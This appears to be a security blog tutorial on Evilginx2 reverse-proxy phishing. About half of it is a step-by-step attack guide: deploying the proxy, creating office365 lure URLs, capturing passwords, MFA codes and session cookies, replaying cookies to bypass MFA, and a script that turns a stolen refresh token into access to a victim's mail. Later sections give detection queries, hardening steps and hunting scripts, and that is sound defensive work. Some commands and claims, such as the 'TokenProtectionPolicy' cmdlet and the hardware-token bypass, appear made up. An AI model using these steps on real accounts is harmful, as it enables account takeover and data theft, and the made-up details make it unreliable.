
Introduction:
Multi-factor authentication (MFA) has become the gold standard for securing access, but adversaries have evolved beyond simple credential phishing. Modern adversary-in-the-middle (AitM) frameworks like Evilginx2 allow attackers to transparently proxy authentication flows, capture plaintext credentials, session cookies, and even bypass hardware tokens in real time. Understanding this attack chain is critical for blue teams to implement effective detections and for red teams to validate defenses.
Learning Objectives:
- Understand how reverse-proxy frameworks bypass MFA and hijack authenticated sessions.
- Set up and configure Evilginx2 for authorized penetration testing and capture OAuth tokens.
- Detect and mitigate AitM attacks using network telemetry, browser policies, and conditional access controls.
You Should Know:
- Deploying an AitM Phishing Proxy – Evilginx2 Step-by-Step
This guide assumes you have a VPS (Ubuntu 22.04) and a registered domain. Evilginx2 creates a reverse proxy that sits between the victim and the legitimate login page, intercepting both credentials and post-MFA session cookies.
Step 1: Install dependencies and Evilginx2
sudo apt update && sudo apt install -y build-essential git golang-go
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo make install
Step 2: Configure the phishlet (template for target service)
Evilginx2 uses “phishlets” – YAML configurations for specific platforms (Microsoft, Google, GitHub, etc.). List available phishlets:
evilginx -p /path/to/phishlets
Select a phishlet, e.g., `office365`:
phishlet get office365
phishlet enable office365
Step 3: Set up domain and lure URL
config domain yourdomain.com
config ip <your_vps_public_ip>
lures create office365
lures edit <lure_id> redirect_url https://real-login.microsoftonline.com
lures get-url <lure_id>
Victims clicking the lure URL see a perfect clone of the login page. When they enter credentials + MFA code, Evilginx2 logs:
– Plaintext password
– MFA code (if app-based)
– Complete session cookie (e.g., ESTSAUTH, ASP.NET_SessionId)
Step 4: Replay the hijacked session
After the victim authenticates, their session cookie is saved. Import it into a browser (EditThisCookie extension) and navigate to the target site – you are now authenticated as the victim, bypassing MFA entirely.
Windows detection command – look for anomalous proxied authentication requests:
# Replace 10.0.0.1 with the suspect source address of the proxied logons
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "10.0.0.1"} | Format-List
- Harvesting Cloud Tokens with Evilginx2 – OAuth & API Abuse
Modern SaaS applications issue OAuth refresh tokens that can be used to generate access tokens for APIs (Graph API, Gmail API, etc.). Evilginx2 captures these tokens, enabling lateral movement and data exfiltration.
Step-by-step guide to capture and use OAuth tokens:
- Enable a phishlet that supports OAuth (e.g., linkedin, azure).
- After the victim authenticates, locate the captured token in the sessions log:
sessions
sessions <session_id>
- Extract the `refresh_token` and use it with a small script such as token_exchange.py:
import requests

data = {
    'client_id': 'your_app_id',
    'refresh_token': 'captured_refresh_token',
    'grant_type': 'refresh_token',
    'client_secret': 'your_secret'
}
r = requests.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=data)
print(r.json()['access_token'])
- Use the access token to query APIs. Example – Microsoft Graph:
curl -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/me/messages
Linux detection – monitor for unusual token requests (note that this traffic is TLS-encrypted on the wire, so the Authorization header is only visible at a point where TLS is terminated, such as an inspecting proxy):
sudo tcpdump -i eth0 -n 'tcp port 443 and (host login.microsoftonline.com or graph.microsoft.com)' -A | grep -i "bearer"
- Hardening Against AitM Phishing – Conditional Access & Device Compliance
Mitigating these attacks requires more than user education. Microsoft’s “Continuous Access Evaluation” (CAE) and device-bound session cookies can break AitM attacks.
Step 1: Enforce compliant devices with Intune
Create a Conditional Access policy requiring “Hybrid Azure AD joined” or “Compliant device” – AitM proxies cannot emulate device posture.
Step 2: Enable token protection (Windows 11/Server 2022)
Set-AzureADPolicy -Definition @('{"TokenProtectionPolicy":{"EnableTokenProtection":true}}') -DisplayName "Token Protection" -Type "TokenProtectionPolicy"
Step 3: Use Web Application Proxy (WAP) with pre-authentication
For on-prem apps, force all authentication through WAP with AD FS MFA – this breaks reverse-proxy flows.
Linux hardening – deploy a custom browser extension that checks for rogue certificates (common in SSL stripping). Note that certificates travel DER-encoded in the TLS handshake and are encrypted entirely in TLS 1.3, so a plain-text match on port 443 is a rough heuristic at best:
# Monitor for self-signed certs in traffic
ngrep -d eth0 -W byline "subject: CN=" port 443
- Simulating an AitM Attack on Your Own Lab – Full Red Team Exercise
Build a safe lab: Ubuntu VPS (attacker) + Windows 11 victim + Microsoft 365 E5 trial.
Step 1: Configure Evilginx2 with a custom phishlet for a demo app (or use the built-in `linkedin` phishlet).
Step 2: Send lure via email (simulate spearphishing) – use Gophish (open-source phishing framework):
# Install Gophish
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip -d gophish && cd gophish
sudo ./gophish
Step 3: Capture credentials – after victim clicks, Evilginx2 logs show:
[22:30:12] [bash] office365: captured credentials: [email protected]:Password123
[22:30:15] [bash] office365: captured MFA code: 123456
[22:30:17] [bash] office365: captured session cookie: ESTSAUTH=AQAB...
Step 4: Session replay – paste cookie into Chrome’s devtools (Application > Cookies) and refresh – MFA bypassed.
Windows detection (Sysmon) – look for unusual process ancestry (browser spawned by Office macro):
# Sysmon event 1: match the ParentImage and Image lines of the event message
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object {$_.Message -match '(?m)^ParentImage: .*\\WINWORD\.EXE' -and $_.Message -match '(?m)^Image: .*\\chrome\.exe'}
- Defensive Response – Hunting for AitM Indicators
Blue teams can hunt for Evilginx2’s fingerprints: missing `Sec-Fetch-` headers, unusual `User-Agent` patterns, and duplicate `Set-Cookie` responses.
Step 1: Deploy Zeek (formerly Bro) to detect proxied logins
# Custom Zeek script to flag AitM patterns
event http_header(c: connection, is_orig: bool, name: string, value: string)
{
    # Zeek delivers header names upper-cased; is_orig == F selects the server-side direction
    if (name == "X-FORWARDED-FOR" && is_orig == F)
        print fmt("Potential proxy: %s", c$id$orig_h);
}
Step 2: Analyze authentication logs for geographic anomalies
# Extract IP from Azure AD sign-in logs via PowerShell
Get-AzureADAuditSignInLogs -Top 100 | Where-Object {$_.Status.ErrorCode -eq 0} | Select-Object UserPrincipalName, IpAddress, ClientAppUsed
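Once the sign-in records are exported, the two hunts the text describes (a session cookie replayed from a second IP, and sign-ins whose geography implies impossible travel) can be scripted. The following is an added example, not the page's or Evilginx2's code; it assumes events have already been normalised to timestamp, user, source IP, session id and GeoIP coordinates, and all sample events are constructed.

```python
"""Hunt normalised sign-in events for session replay and impossible travel."""
from datetime import datetime, timedelta
from math import radians, sin, cos, asin, sqrt

MAX_KMH = 900.0  # assumption: faster than an airliner is not legitimate travel


def km_between(a, b):
    """Great-circle (haversine) distance in km between two (lat, lon) pairs."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def find_anomalies(events, replay_window=timedelta(minutes=30)):
    """Return (kind, user, detail) tuples; kinds are session_replay and impossible_travel."""
    alerts, first_seen, last_by_user = [], {}, {}
    for e in sorted(events, key=lambda e: e["ts"]):
        # Replay: a session id issued to one IP surfaces from another IP within the window.
        sid = e["session"]
        first = first_seen.setdefault(sid, e)
        if first["ip"] != e["ip"] and e["ts"] - first["ts"] <= replay_window:
            alerts.append(("session_replay", e["user"], f"{sid} reused from {e['ip']}"))
        # Impossible travel: implied speed since the user's previous sign-in exceeds MAX_KMH.
        prev = last_by_user.get(e["user"])
        if prev and prev["ip"] != e["ip"]:
            hours = (e["ts"] - prev["ts"]).total_seconds() / 3600
            dist = km_between(prev["geo"], e["geo"])
            if dist > 1 and (hours == 0 or dist / hours > MAX_KMH):
                alerts.append(("impossible_travel", e["user"], f"{dist:.0f} km in {hours:.2f} h"))
        last_by_user[e["user"]] = e
    return alerts


# Constructed sample: alice signs in from Berlin; five minutes later her session
# cookie is presented from a hosting IP geolocated to San Francisco.
T0 = datetime(2024, 5, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0, "user": "alice@example.com", "ip": "203.0.113.10",
     "session": "sess-A", "geo": (52.52, 13.40)},
    {"ts": T0 + timedelta(minutes=5), "user": "alice@example.com", "ip": "198.51.100.7",
     "session": "sess-A", "geo": (37.77, -122.42)},
    {"ts": T0 + timedelta(hours=2), "user": "bob@example.com", "ip": "192.0.2.5",
     "session": "sess-B", "geo": (48.85, 2.35)},
]

if __name__ == "__main__":
    for kind, user, detail in find_anomalies(SAMPLE_EVENTS):
        print(f"{kind:18} {user:20} {detail}")
```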
Step 3: Block known Evilginx2 user-agents (e.g., Evilginx2/0.2). Add to WAF or proxy:
# Nginx configuration
if ($http_user_agent ~ "Evilginx2") {
    return 403;
}
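The fingerprints listed at the start of this section (missing Sec-Fetch-* headers, unusual User-Agent strings, duplicate Set-Cookie responses) and the default user-agent blocked above can be scored together over exported HTTP exchanges. This is an added example, not the page's or Evilginx2's code; the record format and all sample records are constructed, and the tool user-agent list is an assumption.

```python
"""Triage logged HTTP exchanges at the identity provider for AitM proxy fingerprints."""

# Indicators from the text: missing Sec-Fetch-* request headers, a non-browser or
# tool-specific User-Agent, and a response that sets the same cookie name twice.
SEC_FETCH = ("sec-fetch-site", "sec-fetch-mode", "sec-fetch-dest")
KNOWN_TOOL_UAS = ("evilginx",)  # assumption: default tool strings worth flagging by name


def indicators(rec):
    """Return the list of indicator tags that fire for one request/response record."""
    hdr = {k.lower(): v for k, v in rec["req_headers"].items()}
    hits = []
    for h in SEC_FETCH:  # browsers send all three; a rewriting proxy often drops them
        if h not in hdr:
            hits.append("missing:" + h)
    ua = hdr.get("user-agent", "")
    if any(t in ua.lower() for t in KNOWN_TOOL_UAS):
        hits.append("known-tool-ua")
    elif "Mozilla/" not in ua:
        hits.append("non-browser-ua:" + (ua.split("/")[0] or "empty"))
    names = [c.split("=", 1)[0].strip() for c in rec["resp_set_cookie"]]
    dupes = sorted({n for n in names if names.count(n) > 1})
    if dupes:
        hits.append("duplicate-set-cookie:" + ",".join(dupes))
    return hits


def triage(records, min_hits=1):
    """Map record id -> fired indicators for records with at least min_hits indicators."""
    out = {}
    for rec in records:
        hits = indicators(rec)
        if len(hits) >= min_hits:
            out[rec["id"]] = hits
    return out


BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36"
SAMPLE = [  # constructed records, as a reverse proxy or IdP access log might export them
    {"id": "ok-1", "req_headers": {"User-Agent": BROWSER_UA, "Sec-Fetch-Site": "same-origin",
                                   "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"},
     "resp_set_cookie": ["ESTSAUTH=a1; Path=/", "buid=b2; Path=/"]},
    {"id": "sus-2", "req_headers": {"User-Agent": BROWSER_UA},
     "resp_set_cookie": ["ESTSAUTH=a1; Path=/", "ESTSAUTH=c3; Path=/"]},
    {"id": "sus-3", "req_headers": {"User-Agent": "Go-http-client/1.1", "Sec-Fetch-Site": "none",
                                    "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"},
     "resp_set_cookie": []},
]

if __name__ == "__main__":
    for rid, hits in triage(SAMPLE).items():
        print(rid, hits)
```

Raising min_hits trades recall for precision; a single missing header is common enough in legitimate non-browser clients that most teams alert only on two or more indicators.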
What Undercode Say:
- Key Takeaway 1: MFA alone is insufficient against real-time AitM phishing; session token binding to device hardware (e.g., Windows Hello for Business) is the next defensive frontier.
- Key Takeaway 2: Detection must shift from credential-based alerts to behavioral anomalies – impossible travel, missing security headers, and token replay attempts across disparate IPs.
The sophistication of tools like Evilginx2 lowers the barrier for novice attackers while evading legacy security controls. Organizations must adopt phishing-resistant MFA (WebAuthn, FIDO2) and enforce continuous access evaluation. Red teams should integrate AitM frameworks into their arsenals to test detection capabilities, while blue teams should prioritize monitoring for session replay and unusual OAuth token requests. As AI-driven phishing generation becomes mainstream, expect fully automated AitM campaigns that adapt lure content in real time.
Prediction:
By late 2026, AitM-as-a-service will commoditize session hijacking, leading to a surge in supply‑chain compromises via compromised SaaS accounts. In response, identity providers will introduce mandatory device attestation and real‑time risk scoring based on user behavior telemetry. Organizations that fail to adopt phishing‑resistant authenticators will experience breach rates similar to pre‑MFA eras, shifting the attack surface from password theft to session token exfiltration.
Reported By: Infosec Cybersecurity – Hackers Feeds